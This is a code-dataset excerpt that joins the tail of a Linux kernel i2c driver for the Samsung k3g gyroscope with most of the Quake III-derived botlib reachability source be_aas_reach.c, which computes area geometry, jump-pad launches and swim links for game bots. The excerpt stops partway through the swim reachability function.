				k3g_data->ctrl_regs);
		mutex_unlock(&k3g_data->lock);
	}
	return err;
}
/* Power-management callbacks wired into the driver core below. */
static const struct dev_pm_ops k3g_pm_ops = {
	.suspend = k3g_suspend,
	.resume = k3g_resume
};

/* i2c id table: binds this driver to devices declared as "k3g". */
static const struct i2c_device_id k3g_id[] = {
	{ "k3g", 0 },
	{ }
};
MODULE_DEVICE_TABLE(i2c, k3g_id);

static struct i2c_driver k3g_driver = {
	.probe = k3g_probe,
	/* __devexit_p compiles out remove() when hotplug is disabled */
	.remove = __devexit_p(k3g_remove),
	.id_table = k3g_id,
	.driver = {
		.pm = &k3g_pm_ops,
		.owner = THIS_MODULE,
		.name = "k3g"
	},
};
/* Module init: register the i2c driver; probe runs when a matching
 * "k3g" device appears. Fix: the failure message was logged at
 * KERN_INFO and omitted the error code - log it as an error. */
static int __init k3g_init(void)
{
	int ret;

	ret = i2c_add_driver(&k3g_driver);
	if (ret != 0) {
		printk(KERN_ERR "can not add i2c driver: %d\n", ret);
	}
	return ret;
}
/* Module exit: unregister the i2c driver (triggers remove() for bound devices). */
static void __exit k3g_exit(void)
{
	i2c_del_driver(&k3g_driver);
}

module_init(k3g_init);
module_exit(k3g_exit);

MODULE_DESCRIPTION("k3g digital gyroscope driver");
MODULE_AUTHOR("Tim SK Lee Samsung Electronics <tim.sk.lee@samsung.com>");
MODULE_LICENSE("GPL");
| gpl-2.0 |
MrDinnertime/Cvar-Unlocker | codemp/botlib/be_aas_reach.cpp | 4 | 151377 |
/*****************************************************************************
* name: be_aas_reach.c
*
* desc: reachability calculations
*
* $Archive: /MissionPack/code/botlib/be_aas_reach.c $
* $Author: Ttimo $
* $Revision: 12 $
* $Modtime: 4/21/01 9:15a $
* $Date: 4/21/01 9:15a $
*
*****************************************************************************/
#include "qcommon/q_shared.h"
#include "l_log.h"
#include "l_memory.h"
#include "l_script.h"
#include "l_libvar.h"
#include "l_precomp.h"
#include "l_struct.h"
#include "aasfile.h"
#include "botlib.h"
#include "be_aas.h"
#include "be_aas_funcs.h"
#include "be_aas_def.h"
extern int Sys_MilliSeconds(void);
extern botlib_import_t botimport;
//#define REACH_DEBUG
//NOTE: all travel times are in hundreth of a second
//maximum number of reachability links
#define AAS_MAX_REACHABILITYSIZE			65536
//number of areas reachability is calculated for each frame
#define REACHABILITYAREASPERCYCLE			15
//number of units reachability points are placed inside the areas
#define INSIDEUNITS							2
#define INSIDEUNITS_WALKEND					5
#define INSIDEUNITS_WALKSTART				0.1
#define INSIDEUNITS_WATERJUMP				15
//area flag used for weapon jumping
#define AREA_WEAPONJUMP						8192	//valid area to weapon jump to
//per-travel-type counters, incremented as reachabilities are found
//(used for the statistics printed after calculation)
int reach_swim;			//swim
int reach_equalfloor;	//walk on floors with equal height
int reach_step;			//step up
int reach_walk;			//walk of step
int reach_barrier;		//jump up to a barrier
int reach_waterjump;	//jump out of water
int reach_walkoffledge;	//walk of a ledge
int reach_jump;			//jump
int reach_ladder;		//climb or descent a ladder
int reach_teleport;		//teleport
int reach_elevator;		//use an elevator
int reach_funcbob;		//use a func bob
int reach_grapple;		//grapple hook
int reach_doublejump;	//double jump
int reach_rampjump;		//ramp jump
int reach_strafejump;	//strafe jump (just normal jump but further)
int reach_rocketjump;	//rocket jump
int reach_bfgjump;		//bfg jump
int reach_jumppad;		//jump pads
//if true grapple reachabilities are skipped
int calcgrapplereach;
//linked reachability: the in-memory working form of a reachability
//before it is compacted into the AAS file format
typedef struct aas_lreachability_s
{
	int areanum;					//number of the reachable area
	int facenum;					//number of the face towards the other area
	int edgenum;					//number of the edge towards the other area
	vec3_t start;					//start point of inter area movement
	vec3_t end;						//end point of inter area movement
	int traveltype;					//type of travel required to get to the area
	unsigned short int traveltime;	//travel time of the inter area movement
	//
	struct aas_lreachability_s *next;
} aas_lreachability_t;
//temporary reachabilities, managed as a free list by
//AAS_SetupReachabilityHeap / AAS_AllocReachability / AAS_FreeReachability
aas_lreachability_t *reachabilityheap;	//heap with reachabilities
aas_lreachability_t *nextreachability;	//next free reachability from the heap
aas_lreachability_t **areareachability;	//reachability links for every area
int numlreachabilities;
//===========================================================================
// returns the surface area of the given face
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
//===========================================================================
// returns the surface area of the given face
//
// the face is triangulated as a fan around its first vertex; each
// triangle contributes half the length of the cross product of its
// two edge vectors
//
// Parameter:			face : face to measure
// Returns:				surface area of the face
// Changes Globals:		-
//===========================================================================
float AAS_FaceArea(aas_face_t *face)
{
	int n, signededgenum, edgeside;
	float area;
	float *basevertex;
	vec3_t side1, side2, normal;
	aas_edge_t *e;

	//base vertex of the triangle fan: first vertex of the first edge
	signededgenum = aasworld.edgeindex[face->firstedge];
	edgeside = signededgenum < 0;
	e = &aasworld.edges[abs(signededgenum)];
	basevertex = aasworld.vertexes[e->v[edgeside]];

	area = 0;
	for (n = 1; n < face->numedges - 1; n++)
	{
		signededgenum = aasworld.edgeindex[face->firstedge + n];
		edgeside = signededgenum < 0;
		e = &aasworld.edges[abs(signededgenum)];
		VectorSubtract(aasworld.vertexes[e->v[edgeside]], basevertex, side1);
		VectorSubtract(aasworld.vertexes[e->v[!edgeside]], basevertex, side2);
		CrossProduct(side1, side2, normal);
		area += 0.5 * VectorLength(normal);
	} //end for
	return area;
} //end of the function AAS_FaceArea
//===========================================================================
// returns the volume of an area
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
//===========================================================================
// returns the volume of an area
//
// picks one corner vertex of the area and sums, for every face, the
// volume of the pyramid formed by that face and the corner
// (volume = face area * distance to face plane / 3)
//
// Parameter:			areanum : number of the area
// Returns:				volume of the area
// Changes Globals:		-
//===========================================================================
float AAS_AreaVolume(int areanum)
{
	int i, edgenum, facenum, side;
	float d, a, volume;
	vec3_t corner;
	aas_plane_t *plane;
	aas_edge_t *edge;
	aas_face_t *face;
	aas_area_t *area;

	area = &aasworld.areas[areanum];
	facenum = aasworld.faceindex[area->firstface];
	face = &aasworld.faces[abs(facenum)];
	edgenum = aasworld.edgeindex[face->firstedge];
	edge = &aasworld.edges[abs(edgenum)];
	//use the first vertex of the first face as the common apex
	VectorCopy(aasworld.vertexes[edge->v[0]], corner);
	//make tetrahedrons to all other faces
	volume = 0;
	for (i = 0; i < area->numfaces; i++)
	{
		facenum = abs(aasworld.faceindex[area->firstface + i]);
		face = &aasworld.faces[facenum];
		//XOR with 'side' flips the plane to face away from this area
		side = face->backarea != areanum;
		plane = &aasworld.planes[face->planenum ^ side];
		d = -(DotProduct (corner, plane->normal) - plane->dist);
		a = AAS_FaceArea(face);
		volume += d * a;
	} //end for
	volume /= 3;
	return volume;
} //end of the function AAS_AreaVolume
//===========================================================================
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
//===========================================================================
// from a list of area links, picks the most useful area: prefer a
// grounded or swimmable area, otherwise fall back to the first
// non-zero area number in the list
//
// Parameter:			areas : linked list of area links
// Returns:				area number, or 0 if the list is empty
// Changes Globals:		-
//===========================================================================
int AAS_BestReachableLinkArea(aas_link_t *areas)
{
	aas_link_t *link;

	for (link = areas; link; link = link->next_area)
	{
		if (AAS_AreaGrounded(link->areanum) || AAS_AreaSwim(link->areanum))
		{
			return link->areanum;
		} //end if
	} //end for
	//
	for (link = areas; link; link = link->next_area)
	{
		//NOTE(review): this return makes the reachability check below
		//unreachable for any link with a non-zero area number
		if (link->areanum) return link->areanum;
		//FIXME: this is a bad idea when the reachability is not yet
		// calculated when the level items are loaded
		if (AAS_AreaReachability(link->areanum))
			return link->areanum;
	} //end for
	return 0;
} //end of the function AAS_BestReachableLinkArea
//===========================================================================
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
//===========================================================================
// extracts launch information from a trigger_push BSP entity
//
// Parameter:			ent : BSP entity number of the trigger_push
//						areastart : set to a point just above the pad surface
//						absmins, absmaxs : set to the pad brush bounds
//						velocity : set to the launch velocity towards the target
// Returns:				qtrue on success, qfalse if the target entity is
//						missing or the flight time works out to zero
// Changes Globals:		-
//===========================================================================
int AAS_GetJumpPadInfo(int ent, vec3_t areastart, vec3_t absmins, vec3_t absmaxs, vec3_t velocity)
{
	int modelnum, ent2;
	float speed, height, gravity, time, dist, forward;
	vec3_t origin, angles, teststart, ent2origin;
	aas_trace_t trace;
	char model[MAX_EPAIRKEY];
	char target[MAX_EPAIRKEY], targetname[MAX_EPAIRKEY];
	//
	AAS_FloatForBSPEpairKey(ent, "speed", &speed);
	if (!speed) speed = 1000;
	VectorClear(angles);
	//get the mins, maxs and origin of the model
	//model key is "*<nnn>"; skip the '*' to get the inline model number
	AAS_ValueForBSPEpairKey(ent, "model", model, MAX_EPAIRKEY);
	if (model[0]) modelnum = atoi(model+1);
	else modelnum = 0;
	AAS_BSPModelMinsMaxsOrigin(modelnum, angles, absmins, absmaxs, origin);
	VectorAdd(origin, absmins, absmins);
	VectorAdd(origin, absmaxs, absmaxs);
	//origin becomes the center of the pad brush
	VectorAdd(absmins, absmaxs, origin);
	VectorScale (origin, 0.5, origin);
	//get the start areas
	VectorCopy(origin, teststart);
	teststart[2] += 64;
	trace = AAS_TraceClientBBox(teststart, origin, PRESENCE_CROUCH, -1);
	if (trace.startsolid)
	{
		botimport.Print(PRT_MESSAGE, "trigger_push start solid\n");
		VectorCopy(origin, areastart);
	} //end if
	else
	{
		VectorCopy(trace.endpos, areastart);
	} //end else
	areastart[2] += 0.125;
	//
	//AAS_DrawPermanentCross(origin, 4, 4);
	//get the target entity: scan all entities for a matching targetname
	AAS_ValueForBSPEpairKey(ent, "target", target, MAX_EPAIRKEY);
	for (ent2 = AAS_NextBSPEntity(0); ent2; ent2 = AAS_NextBSPEntity(ent2))
	{
		if (!AAS_ValueForBSPEpairKey(ent2, "targetname", targetname, MAX_EPAIRKEY)) continue;
		if (!strcmp(targetname, target)) break;
	} //end for
	if (!ent2)
	{
		botimport.Print(PRT_MESSAGE, "trigger_push without target entity %s\n", target);
		return qfalse;
	} //end if
	AAS_VectorForBSPEpairKey(ent2, "origin", ent2origin);
	//ballistic flight time to reach the target's height under gravity
	height = ent2origin[2] - origin[2];
	gravity = aassettings.phys_gravity;
	time = sqrt( height / ( 0.5 * gravity ) );
	//NOTE(review): exact float comparison; time is only 0 when height is 0
	if (!time)
	{
		botimport.Print(PRT_MESSAGE, "trigger_push without time\n");
		return qfalse;
	} //end if
	// set s.origin2 to the push velocity
	VectorSubtract ( ent2origin, origin, velocity);
	dist = VectorNormalize( velocity);
	forward = dist / time;
	//FIXME: why multiply by 1.1
	forward *= 1.1f;
	VectorScale(velocity, forward, velocity);
	velocity[2] = time * gravity;
	return qtrue;
} //end of the function AAS_GetJumpPadInfo
//===========================================================================
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
//===========================================================================
// finds the jump pad area whose trigger_push launches a client so that
// its flight intersects the given bounding box; among the pad's areas
// the one with the largest volume wins
//
// Parameter:			origin : center of the target bounding box
//						mins, maxs : target bounding box extents
// Returns:				best jump pad area number, or 0 if none found
// Changes Globals:		-
//===========================================================================
int AAS_BestReachableFromJumpPadArea(vec3_t origin, vec3_t mins, vec3_t maxs)
{
	int ent, bot_visualizejumppads, bestareanum;
	float volume, bestareavolume;
	vec3_t areastart, cmdmove, bboxmins, bboxmaxs;
	vec3_t absmins, absmaxs, velocity;
	aas_clientmove_t move;
	aas_link_t *areas, *link;
	char classname[MAX_EPAIRKEY];

#ifdef BSPC
	bot_visualizejumppads = 0;
#else
	bot_visualizejumppads = LibVarValue("bot_visualizejumppads", "0");
#endif
	VectorAdd(origin, mins, bboxmins);
	VectorAdd(origin, maxs, bboxmaxs);
	//walk every trigger_push entity in the BSP
	for (ent = AAS_NextBSPEntity(0); ent; ent = AAS_NextBSPEntity(ent))
	{
		if (!AAS_ValueForBSPEpairKey(ent, "classname", classname, MAX_EPAIRKEY)) continue;
		if (strcmp(classname, "trigger_push")) continue;
		//
		if (!AAS_GetJumpPadInfo(ent, areastart, absmins, absmaxs, velocity)) continue;
		//get the areas the jump pad brush is in
		areas = AAS_LinkEntityClientBBox(absmins, absmaxs, -1, PRESENCE_CROUCH);
		for (link = areas; link; link = link->next_area)
		{
			if (AAS_AreaJumpPad(link->areanum)) break;
		} //end for
		if (!link)
		{
			botimport.Print(PRT_MESSAGE, "trigger_push not in any jump pad area\n");
			AAS_UnlinkFromAreas(areas);
			continue;
		} //end if
		//
		//botimport.Print(PRT_MESSAGE, "found a trigger_push with velocity %f %f %f\n", velocity[0], velocity[1], velocity[2]);
		//simulate the launch; move.frames < 30 means the flight hit the
		//target bbox before the 30-frame limit ran out
		VectorSet(cmdmove, 0, 0, 0);
		Com_Memset(&move, 0, sizeof(aas_clientmove_t));
		AAS_ClientMovementHitBBox(&move, -1, areastart, PRESENCE_NORMAL, qfalse,
								velocity, cmdmove, 0, 30, 0.1f, bboxmins, bboxmaxs, bot_visualizejumppads);
		if (move.frames < 30)
		{
			//pick the largest jump pad area of this pad
			bestareanum = 0;
			bestareavolume = 0;
			for (link = areas; link; link = link->next_area)
			{
				if (!AAS_AreaJumpPad(link->areanum)) continue;
				volume = AAS_AreaVolume(link->areanum);
				if (volume >= bestareavolume)
				{
					bestareanum = link->areanum;
					bestareavolume = volume;
				} //end if
			} //end for
			AAS_UnlinkFromAreas(areas);
			return bestareanum;
		} //end if
		AAS_UnlinkFromAreas(areas);
	} //end for
	return 0;
} //end of the function AAS_BestReachableFromJumpPadArea
//===========================================================================
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
//===========================================================================
// finds the best reachable area for an item with the given bounding box;
// first tries the point itself (fudging around a little and dropping a
// client box down), then falls back to linking the box into the world
// and picking the best linked area
//
// Parameter:			origin : item origin
//						mins, maxs : item bounding box
//						goalorigin : set to the point to move towards
// Returns:				area number, or 0 if none found
// Changes Globals:		-
//===========================================================================
int AAS_BestReachableArea(vec3_t origin, vec3_t mins, vec3_t maxs, vec3_t goalorigin)
{
	int areanum, i, j, k, l;
	aas_link_t *areas;
	vec3_t absmins, absmaxs;
	//vec3_t bbmins, bbmaxs;
	vec3_t start, end;
	aas_trace_t trace;

	if (!aasworld.loaded)
	{
		botimport.Print(PRT_ERROR, "AAS_BestReachableArea: aas not loaded\n");
		return 0;
	} //end if
	//find a point in an area
	VectorCopy(origin, start);
	areanum = AAS_PointAreaNum(start);
	//while no area found fudge around a little: try offsets of up to
	//16 units sideways (j*4 in each horizontal direction) and upward (i*4)
	for (i = 0; i < 5 && !areanum; i++)
	{
		for (j = 0; j < 5 && !areanum; j++)
		{
			for (k = -1; k <= 1 && !areanum; k++)
			{
				for (l = -1; l <= 1 && !areanum; l++)
				{
					VectorCopy(origin, start);
					start[0] += (float) j * 4 * k;
					start[1] += (float) j * 4 * l;
					start[2] += (float) i * 4;
					areanum = AAS_PointAreaNum(start);
				} //end for
			} //end for
		} //end for
	} //end for
	//if an area was found
	if (areanum)
	{
		//drop client bbox down and try again
		VectorCopy(start, end);
		start[2] += 0.25;
		end[2] -= 50;
		trace = AAS_TraceClientBBox(start, end, PRESENCE_CROUCH, -1);
		if (!trace.startsolid)
		{
			areanum = AAS_PointAreaNum(trace.endpos);
			VectorCopy(trace.endpos, goalorigin);
			//FIXME: cannot enable next line right now because the reachability
			// does not have to be calculated when the level items are loaded
			//if the origin is in an area with reachability
			//if (AAS_AreaReachability(areanum)) return areanum;
			if (areanum) return areanum;
		} //end if
		else
		{
			//it can very well happen that the AAS_PointAreaNum function tells that
			//a point is in an area and that starting an AAS_TraceClientBBox from that
			//point will return trace.startsolid qtrue
#if 0
			if (AAS_PointAreaNum(start))
			{
				Log_Write("point %f %f %f in area %d but trace startsolid", start[0], start[1], start[2], areanum);
				AAS_DrawPermanentCross(start, 4, LINECOLOR_RED);
			} //end if
			botimport.Print(PRT_MESSAGE, "AAS_BestReachableArea: start solid\n");
#endif
			VectorCopy(start, goalorigin);
			return areanum;
		} //end else
	} //end if
	//
	//AAS_PresenceTypeBoundingBox(PRESENCE_CROUCH, bbmins, bbmaxs);
	//NOTE: the goal origin does not have to be in the goal area
	// because the bot will have to move towards the item origin anyway
	VectorCopy(origin, goalorigin);
	//
	VectorAdd(origin, mins, absmins);
	VectorAdd(origin, maxs, absmaxs);
	//add bounding box size
	//VectorSubtract(absmins, bbmaxs, absmins);
	//VectorSubtract(absmaxs, bbmins, absmaxs);
	//link an invalid (-1) entity
	areas = AAS_LinkEntityClientBBox(absmins, absmaxs, -1, PRESENCE_CROUCH);
	//get the reachable link area
	areanum = AAS_BestReachableLinkArea(areas);
	//unlink the invalid entity
	AAS_UnlinkFromAreas(areas);
	//
	return areanum;
} //end of the function AAS_BestReachableArea
//===========================================================================
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
//===========================================================================
// allocates the temporary reachability heap and chains all entries
// together into one free list
//
// Parameter:			-
// Returns:				-
// Changes Globals:		reachabilityheap, nextreachability, numlreachabilities
//===========================================================================
void AAS_SetupReachabilityHeap(void)
{
	int n;

	reachabilityheap = (aas_lreachability_t *) GetClearedMemory(
					AAS_MAX_REACHABILITYSIZE * sizeof(aas_lreachability_t));
	//the last entry terminates the free list
	reachabilityheap[AAS_MAX_REACHABILITYSIZE - 1].next = NULL;
	//link every other entry to its successor, back to front
	for (n = AAS_MAX_REACHABILITYSIZE - 2; n >= 0; n--)
	{
		reachabilityheap[n].next = &reachabilityheap[n + 1];
	} //end for
	//allocation starts at the first entry
	nextreachability = reachabilityheap;
	numlreachabilities = 0;
} //end of the function AAS_SetupReachabilityHeap
//===========================================================================
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
void AAS_ShutDownReachabilityHeap(void)
{
FreeMemory(reachabilityheap);
numlreachabilities = 0;
} //end of the function AAS_ShutDownReachabilityHeap
//===========================================================================
// returns a reachability link
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
aas_lreachability_t *AAS_AllocReachability(void)
{
aas_lreachability_t *r;
if (!nextreachability) return NULL;
//make sure the error message only shows up once
if (!nextreachability->next) AAS_Error("AAS_MAX_REACHABILITYSIZE\n");
//
r = nextreachability;
nextreachability = nextreachability->next;
numlreachabilities++;
return r;
} //end of the function AAS_AllocReachability
//===========================================================================
// frees a reachability link
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
//wipes a reachability link and pushes it back onto the free list
void AAS_FreeReachability(aas_lreachability_t *lreach)
{
	Com_Memset(lreach, 0, sizeof(*lreach));
	//push onto the head of the free list
	lreach->next = nextreachability;
	nextreachability = lreach;
	numlreachabilities--;
} //end of the function AAS_FreeReachability
//===========================================================================
// returns qtrue if the area has reachability links
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
//returns the number of reachable areas from the given area, 0 on a bad areanum
int AAS_AreaReachability(int areanum)
{
	//validate the area number before indexing the settings array
	if (areanum >= 0 && areanum < aasworld.numareas)
	{
		return aasworld.areasettings[areanum].numreachableareas;
	} //end if
	AAS_Error("AAS_AreaReachability: areanum %d out of range\n", areanum);
	return 0;
} //end of the function AAS_AreaReachability
//===========================================================================
// returns the surface area of all ground faces together of the area
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
//returns the combined surface area of all ground faces of the area
float AAS_AreaGroundFaceArea(int areanum)
{
	aas_area_t *area;
	aas_face_t *face;
	float sum;
	int i;

	sum = 0;
	area = &aasworld.areas[areanum];
	for (i = 0; i < area->numfaces; i++)
	{
		//face indexes may be negative to flag orientation; abs() gives the face
		face = &aasworld.faces[abs(aasworld.faceindex[area->firstface + i])];
		//only ground faces contribute to the total
		if (face->faceflags & FACE_GROUND)
		{
			sum += AAS_FaceArea(face);
		} //end if
	} //end for
	return sum;
} //end of the function AAS_AreaGroundFaceArea
//===========================================================================
// returns the center of a face
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
//computes the center of a face as the average of its edge vertexes
void AAS_FaceCenter(int facenum, vec3_t center)
{
	aas_face_t *face;
	aas_edge_t *edge;
	int i;

	face = &aasworld.faces[facenum];
	VectorClear(center);
	//sum both vertexes of every edge; each vertex is counted twice
	//because adjacent edges share it
	for (i = 0; i < face->numedges; i++)
	{
		edge = &aasworld.edges[abs(aasworld.edgeindex[face->firstedge + i])];
		VectorAdd(center, aasworld.vertexes[edge->v[0]], center);
		VectorAdd(center, aasworld.vertexes[edge->v[1]], center);
	} //end for
	//divide by 2 * numedges to compensate for the double counting
	VectorScale(center, 0.5 / face->numedges, center);
} //end of the function AAS_FaceCenter
//===========================================================================
// returns the maximum distance a player can fall before being damaged
// damage = deltavelocity*deltavelocity * 0.0001
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
//returns the maximum distance a player can fall before being damaged
//(fall damage = deltavelocity * deltavelocity * 0.0001)
int AAS_FallDamageDistance(void)
{
	float gravity, zvel, falltime;

	//z velocity at which damage starts: sqrt(30 * 10000) from the damage formula
	zvel = sqrt((float)(30 * 10000));
	gravity = aassettings.phys_gravity;
	//time needed to reach that velocity when falling from rest
	falltime = zvel / gravity;
	//distance fallen in that time
	return 0.5 * gravity * falltime * falltime;
} //end of the function AAS_FallDamageDistance
//===========================================================================
// distance = 0.5 * gravity * t * t
// vel = t * gravity
// damage = vel * vel * 0.0001
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
//returns the fall damage for falling the given distance:
//  distance = 0.5 * gravity * t * t,  vel = t * gravity,
//  damage = vel * vel * 0.0001
float AAS_FallDelta(float distance)
{
	float gravity, falltime, vel;

	gravity = aassettings.phys_gravity;
	//solve distance = 0.5 * gravity * t * t for the fall time
	falltime = sqrt(fabs(distance) * 2 / gravity);
	//velocity at impact
	vel = falltime * gravity;
	return vel * vel * 0.0001;
} //end of the function AAS_FallDelta
//===========================================================================
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
//returns the maximum height a player can jump with the given initial z velocity
float AAS_MaxJumpHeight(float phys_jumpvel)
{
	float phys_gravity, risetime;

	phys_gravity = aassettings.phys_gravity;
	//time until gravity cancels the upward jump velocity
	risetime = phys_jumpvel / phys_gravity;
	//height gained during that time: 0.5 * g * t^2
	return 0.5 * phys_gravity * risetime * risetime;
} //end of the function AAS_MaxJumpHeight
//===========================================================================
// returns the maximum horizontal distance a player can cover with a jump
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
//returns the maximum horizontal distance a player can cover with a jump
float AAS_MaxJumpDistance(float phys_jumpvel)
{
	float gravity, maxvel, falltime;

	gravity = aassettings.phys_gravity;
	maxvel = aassettings.phys_maxvelocity;
	//time it takes to fall rs_maxjumpfallheight units
	falltime = sqrt(aassettings.rs_maxjumpfallheight / (0.5 * gravity));
	//horizontal distance covered at maximum speed during the fall time
	//plus the time the jump velocity keeps the player rising
	return maxvel * (falltime + phys_jumpvel / gravity);
} //end of the function AAS_MaxJumpDistance
//===========================================================================
// returns true if a player can only crouch in the area
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
//returns qtrue if a player can only crouch in the area
int AAS_AreaCrouch(int areanum)
{
	//an area without normal (standing) presence only allows crouching
	return !(aasworld.areasettings[areanum].presencetype & PRESENCE_NORMAL);
} //end of the function AAS_AreaCrouch
//===========================================================================
// returns qtrue if it is possible to swim in the area
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
//returns qtrue if it is possible to swim in the area
int AAS_AreaSwim(int areanum)
{
	//swimming is possible in any area containing a liquid
	return (aasworld.areasettings[areanum].areaflags & AREA_LIQUID) != 0;
} //end of the function AAS_AreaSwim
//===========================================================================
// returns qtrue if the area contains a liquid
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
//returns qtrue if the area contains a liquid
int AAS_AreaLiquid(int areanum)
{
	return (aasworld.areasettings[areanum].areaflags & AREA_LIQUID) != 0;
} //end of the function AAS_AreaLiquid
//===========================================================================
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
//returns non-zero if the area contains lava
//NOTE: returns the raw contents bit, not qtrue/qfalse
int AAS_AreaLava(int areanum)
{
	int contents = aasworld.areasettings[areanum].contents;
	return contents & AREACONTENTS_LAVA;
} //end of the function AAS_AreaLava
//===========================================================================
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
//returns non-zero if the area contains slime
//NOTE: returns the raw contents bit, not qtrue/qfalse
int AAS_AreaSlime(int areanum)
{
	int contents = aasworld.areasettings[areanum].contents;
	return contents & AREACONTENTS_SLIME;
} //end of the function AAS_AreaSlime
//===========================================================================
// returns qtrue if the area contains ground faces
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
//returns non-zero if the area contains ground faces
//NOTE: returns the raw area flag bit, not qtrue/qfalse
int AAS_AreaGrounded(int areanum)
{
	int areaflags = aasworld.areasettings[areanum].areaflags;
	return areaflags & AREA_GROUNDED;
} //end of the function AAS_AreaGrounded
//===========================================================================
// returns true if the area contains ladder faces
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
//returns non-zero if the area contains ladder faces
//NOTE: returns the raw area flag bit, not qtrue/qfalse
int AAS_AreaLadder(int areanum)
{
	int areaflags = aasworld.areasettings[areanum].areaflags;
	return areaflags & AREA_LADDER;
} //end of the function AAS_AreaLadder
//===========================================================================
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
//returns non-zero if the area contains a jump pad
//NOTE: returns the raw contents bit, not qtrue/qfalse
int AAS_AreaJumpPad(int areanum)
{
	int contents = aasworld.areasettings[areanum].contents;
	return contents & AREACONTENTS_JUMPPAD;
} //end of the function AAS_AreaJumpPad
//===========================================================================
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
//returns non-zero if the area contains a teleporter
//NOTE: returns the raw contents bit, not qtrue/qfalse
int AAS_AreaTeleporter(int areanum)
{
	int contents = aasworld.areasettings[areanum].contents;
	return contents & AREACONTENTS_TELEPORTER;
} //end of the function AAS_AreaTeleporter
//===========================================================================
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
//returns non-zero if the area is a cluster portal
//NOTE: returns the raw contents bit, not qtrue/qfalse
int AAS_AreaClusterPortal(int areanum)
{
	int contents = aasworld.areasettings[areanum].contents;
	return contents & AREACONTENTS_CLUSTERPORTAL;
} //end of the function AAS_AreaClusterPortal
//===========================================================================
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
//returns non-zero if the area is marked do-not-enter
//NOTE: returns the raw contents bit, not qtrue/qfalse
int AAS_AreaDoNotEnter(int areanum)
{
	int contents = aasworld.areasettings[areanum].contents;
	return contents & AREACONTENTS_DONOTENTER;
} //end of the function AAS_AreaDoNotEnter
//===========================================================================
// returns the time it takes perform a barrier jump
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
//returns the time it takes to perform a barrier jump
unsigned short int AAS_BarrierJumpTravelTime(void)
{
	float jumpvel, gravity;

	jumpvel = aassettings.phys_jumpvel;
	gravity = aassettings.phys_gravity;
	//rise time jumpvel / gravity, scaled by the 0.1 factor into travel time units
	return jumpvel / (gravity * 0.1);
} //end of the function AAS_BarrierJumpTravelTime
//===========================================================================
// returns true if there already exists a reachability from area1 to area2
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
qboolean AAS_ReachabilityExists(int area1num, int area2num)
{
aas_lreachability_t *r;
for (r = areareachability[area1num]; r; r = r->next)
{
if (r->areanum == area2num) return qtrue;
} //end for
return qfalse;
} //end of the function AAS_ReachabilityExists
//===========================================================================
// returns true if there is a solid just after the end point when going
// from start to end
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
//returns qtrue if there is a solid or a gap just after the end point
//when going from start to end
int AAS_NearbySolidOrGap(vec3_t start, vec3_t end)
{
	vec3_t horizdir, probe;
	int areanum;

	//horizontal direction from start to end
	VectorSubtract(end, start, horizdir);
	horizdir[2] = 0;
	VectorNormalize(horizdir);
	//probe a point 48 units past the end point
	VectorMA(end, 48, horizdir, probe);
	areanum = AAS_PointAreaNum(probe);
	if (!areanum)
	{
		//no area found; retry slightly higher, if still nothing assume solid
		probe[2] += 16;
		areanum = AAS_PointAreaNum(probe);
		if (!areanum) return qtrue;
	} //end if
	//probe a point 64 units past the end point; an area that can neither be
	//swum in nor stood on counts as a gap
	VectorMA(end, 64, horizdir, probe);
	areanum = AAS_PointAreaNum(probe);
	if (areanum && !AAS_AreaSwim(areanum) && !AAS_AreaGrounded(areanum))
	{
		return qtrue;
	} //end if
	return qfalse;
} //end of the function AAS_NearbySolidOrGap
//===========================================================================
// searches for swim reachabilities between adjacent areas
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
int AAS_Reachability_Swim(int area1num, int area2num)
{
	int i, j, face1num, face2num, side1;
	aas_area_t *area1, *area2;
	aas_lreachability_t *lreach;
	aas_face_t *face1;
	aas_plane_t *plane;
	vec3_t start;
	//both areas must contain a liquid to swim between them
	if (!AAS_AreaSwim(area1num) || !AAS_AreaSwim(area2num)) return qfalse;
	//if the second area is crouch only
	if (!(aasworld.areasettings[area2num].presencetype & PRESENCE_NORMAL)) return qfalse;
	area1 = &aasworld.areas[area1num];
	area2 = &aasworld.areas[area2num];
	//if the areas are not near enough (bounding boxes must overlap within 10 units)
	for (i = 0; i < 3; i++)
	{
		if (area1->mins[i] > area2->maxs[i] + 10) return qfalse;
		if (area1->maxs[i] < area2->mins[i] - 10) return qfalse;
	} //end for
	//find a shared face and create a reachability link
	for (i = 0; i < area1->numfaces; i++)
	{
		//a negative face index flags which side of the face area1 is on
		face1num = aasworld.faceindex[area1->firstface + i];
		side1 = face1num < 0;
		face1num = abs(face1num);
		//
		for (j = 0; j < area2->numfaces; j++)
		{
